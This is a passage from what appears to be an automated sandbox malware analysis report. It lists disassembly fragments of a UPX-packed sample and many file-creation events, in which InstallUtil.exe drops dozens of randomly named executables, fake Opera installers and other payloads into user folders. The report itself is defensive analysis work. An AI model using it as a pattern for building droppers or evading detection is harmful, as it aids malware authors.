                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00408104 push ecx; mov dword ptr [esp], eax14_2_00408109
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00404185 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00404206 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_0040C218 push eax; ret 14_2_0040C219
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_004042E8 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00404283 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00408F38 push 00408F6Bh; ret 14_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040994C push 00409989h; ret 15_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00483F88 push 00484096h; ret 15_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004062B4 push ecx; mov dword ptr [esp], eax15_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004104E0 push ecx; mov dword ptr [esp], edx15_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00412928 push 0041298Bh; ret 15_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00494CAC push ecx; mov dword ptr [esp], ecx15_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040CE38 push ecx; mov dword ptr [esp], edx15_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004592D0 push 00459314h; ret 15_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040F398 push ecx; mov dword ptr [esp], edx15_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00443440 push ecx; mov dword ptr [esp], ecx15_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040546D push eax; ret 15_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040553D push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004055BE push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00485678 push ecx; mov dword ptr [esp], ecx15_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040563B push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004056A0 push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004517F8 push 0045182Bh; ret 15_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004519BC push ecx; mov dword ptr [esp], eax15_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00477B08 push ecx; mov dword ptr [esp], edx15_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00419C28 push ecx; mov dword ptr [esp], ecx15_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045FD1C push ecx; mov dword ptr [esp], ecx15_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00499D30 pushad ; retf 15_2_00499D3F
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 16_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 17_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 17_2_009BFE99
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\MZK43d4eyhmNVFNhS9RLdaaU.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\aY7RTHx8jQe0LE98Ey8c4ndl.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\dxR7p0Pw8zQ312jALneLeimr.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\kJzN0xpcdgPX8gN1vxWscdbl.exe
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | File created: C:\Users\user\AppData\Local\Temp\nsiC1CE.tmp\INetC.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\t9y8ObbFiYcOWDbXePjVCsko.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\UGsTnu7EDyO0V3IPPKetoYJJ.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\dyzUSu8swmONfKr10ailCBUT.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\xgPBlpX67jxMBR1TQvyDxw3Z.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-TSKOF.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\ksgmAg6JFdvOTBh26OHdTIc1.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\meewdacxdZVSIEbNRUL5vYdZ.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\K38UiC8IqghDOwq5NDROdySK.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll (copy)
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | File created: C:\Users\user\AppData\Local\Temp\syncUpd.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\nUeK1cEoa1XzerepeCLGgwoc.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll (copy)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\5v3yEEfK5SV2v9Tq3rUk66Ct.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\kbc9DF565eKnpzDzd5tpGZeU.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\zWNPblMz8jR3viBabeOSPbWa.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\PYAjuaDlqLKzTVmA3BsThyOt.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\UVZ0INMy369gioArueMwqIMb.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\HaCcBcrdDQmsjXXJmI2sBmiB.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\rMRbGvsAwIiAMKrvwkPegxs9.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-4024Q.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\9mAmsWjPEPtkITVqz02hZgXo.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\gNNWpgxfSZev9CgAoQqZomFj.exe
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | File created: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\c36pugF7AAA4eRfz8vwQAxCJ.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\gUW3x0OL7IoJHOyAbWlNdUAG.exe
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\8MN4Hb5Yz3QkTtMyZERbTpkY.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\aUwbp4hWfsJe82ZKgal8jxB3.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\4OwcyrblkGc2hCszHEHuZCPV.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\n6BdP4kaWy0FkY7qAUh37msr.exe
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Opera_108.0.5067.24_Autoupdate_x64[3].exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\r8s8W6BwO9zs4dtTCMpyOk6D.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Q8fp1UEXdipsRABJgu0jdZxz.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\AvqWRNqIe0AJSvnee1t8rq4f.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\8lHsEF0BGMRxgVNdr9FiuFje.exe
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | File created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe
                    Source: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe | File created: C:\Users\user\AppData\Local\Temp\is-TLIOH.tmp\PvJ9KZy5kaC0ZzTLP46Ng6g6.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\ph6WaZo2QKdqQsAcLgEj5AUn.exe
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\xzRRQmj1LpBxF1iTy72H1YWe.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\libbz2-1.dll (copy)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\gJVExh69UXMYc2ZOtdjmxeSQ.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\XHapUUFNPyUhtn0ymqhPvOC6.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-177IU.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\04gOIpVzf7VOcPzY7ZRrzAhZ.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\gqqSecZ0iDGmpNUFqal8ttIk.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\arAAytPAHIBxEUE8lqY8jFUv.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\oL8szwawgpXgbnICrbhJSivs.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\OVpl7ZoSx7d60PF3UKl2AN2h.exe
                    Source: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe | File created: C:\Users\user\AppData\Local\Temp\is-O74DV.tmp\jUzz7ezNBFbkGCxJO9DOH9dj.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_package
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\JOJIhk0AcI9isky7MBqL1aC9.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\5TjWUMIFlYsM1w3seMz5vnCW.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\unins000.exe (copy)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\fZDr3c80pCnwYiNsqew1ltFz.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\XvEaDZrVEGhrm4VFfP27fZuD.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\VaASjTWoLMCHI6PCL8cSdHon.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\esF1MUrWaaVP5MG9h4MWEG3L.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\libwinpthread-1.dll (copy)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\KSHZwMcueWwTgI47ePC7IUrm.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_setup64.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Y4LnHhMyiOb93nCmM4lvPIko.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\u47GFmiT4x96ZGJgiflf2j9o.exe
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530026645880.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\tX8EOAwWEHtskvnslQFfJ9Qi.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\HAXdOUoV7y3UWdGfKLEhbRIe.exe
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403120753276464480.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\ZT6AzWxWIFXd7OjNGkbd7Uza.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\dUxbeTroGHi03yY2SNfS5bOl.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\uu6kK0oC1Fx2nv3ruwv5SpiV.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\vuP05YoHCo3Zp0Gv9gzt1k3R.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-R5M1I.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\TSj4lbXBm0ozR2JnFqSdYKyt.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-NT0K2.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_shfoldr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\GzFms1Le87SMGeCC7Il4yqA4.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\rNCmmZEPp5euqDjbZiBkBeGL.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\BQEn0lhfn4Y5OIYegdFv1wu3.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | File created: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_shfoldr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\s0seUKprDs1WGnkEHPu39VtW.exe
                    Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531585744560.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\rPFTzpNmT3Qntv8acJaf28oV.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\JrAWQORf1HLTD3qpLJ2Euz6u.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exe
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | File created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\gT3BUxoUuQnRaSRZpGvobcTI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\byobdbFYFRrd9psjQQD2jS1U.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exeJump to dropped file
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\bizN5UTpdWpltkCaYrvmwbQI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\KECo793ffsnuAKrbhcJr4Al2.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\rekePksAYJc4iZuuuIdGaK6L.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\sMiDMUawiFqOcW9q4tC0ZctA.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\JJGhmGOEefZp3FWJtWea5kYv.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\tcyRy6ARtqpoDWzM7VLf6fDh.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Rgkr8aA7ALrPn82WFNFcy4fg.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\EaLGCYiRQM2XOtVzyy0ADczF.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gatqNuidCSGWV0xrVKmzpZfK.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\kW8yqxmpQubjD4ulwCtyGF1P.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853491\opera_packageJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\HnpqZr8MiBteqHFNrwWZBXQR.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\KF9G3AcCbu7Zl4IuQK8qDucc.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\j9oiPedoYJq65MrsMIBEWZ24.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\LHg0H4yHSfuTfUKbSoOyunge.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\EjtrSvV6de28lGZAjtWMHEkL.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\r5rrZo2uJpDKzb6r7Ao0yzpg.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Opera_108.0.5067.24_Autoupdate_x64[3].exeJump to dropped file
